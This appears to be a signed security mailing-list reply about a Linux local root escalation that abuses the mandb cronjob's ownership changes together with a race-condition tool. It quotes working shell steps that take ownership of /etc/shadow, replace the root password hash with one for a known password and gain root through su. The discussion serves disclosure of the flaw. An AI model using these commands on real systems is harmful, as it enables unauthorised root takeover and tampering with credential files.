Re: User man Local Root Exploit/Linux Kernel setgid Directory Privilege Escalation/PAM Owner Check Weakness

[halfdog <me () halfdog net>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Dag-Erling Smørgrav wrote:
> halfdog <me () halfdog net> writes:
> > Dag-Erling Smørgrav <des () des no> writes:
> > > And the PAM issue?
> > That's the most questionable.
>
> Hard to tell, since you didn't provide any information about it.
> You mentioned three issues, but linked to only two advisories,
> neither of which mentions PAM.

I was referring to this from [1], but perhaps I should have
highlighted it more prominently:


Using Timerace Using Inotify: As the mandb cronjob will change
ownership of any file to user man, there are numerous targets for
privilege escalation. The one I like best when /bin/su SUID binary
available is to change /etc/shadow. PAM just does not recognise this
state, so only root password has to be cleared for su logon. For that
purpose, the good old inotify-tool DirModifyInotify-20110530.c from a
previous article. To escalate following steps are sufficient:

man# mkdir -p /var/cache/man/etc
man# ln /var/crash/.lock /var/cache/man/etc/shadow
man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0
- --MovePath /var/cache/man/etc --LinkTarget /etc
... Wait till daily cronjob was run
man# cp /etc/shadow .
man# sed -r -e
's/^root:.*/root:$1$kKBXcycA$w.1NUJ77AuKcSYYrjLn9s1:15462:0:99999:7:::/'
/etc/shadow > x
man# cat x > /etc/shadow; rm x
man# su -s /bin/sh (password is 123)
root# cat shadow > /etc/shadow; chown root /etc/shadow

[1]
http://www.halfdog.net/Security/2015/MandbSymlinkLocalRootPrivilegeEscalation/

- -- 
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iEYEARECAAYFAlZwaSQACgkQxFmThv7tq+60RACfbNp7aKX+dAn9NhCbqP1m/O0g
iAQAnAqjS/ujumwfQV7K4AYTQ326QoZj
=zuRK
-----END PGP SIGNATURE-----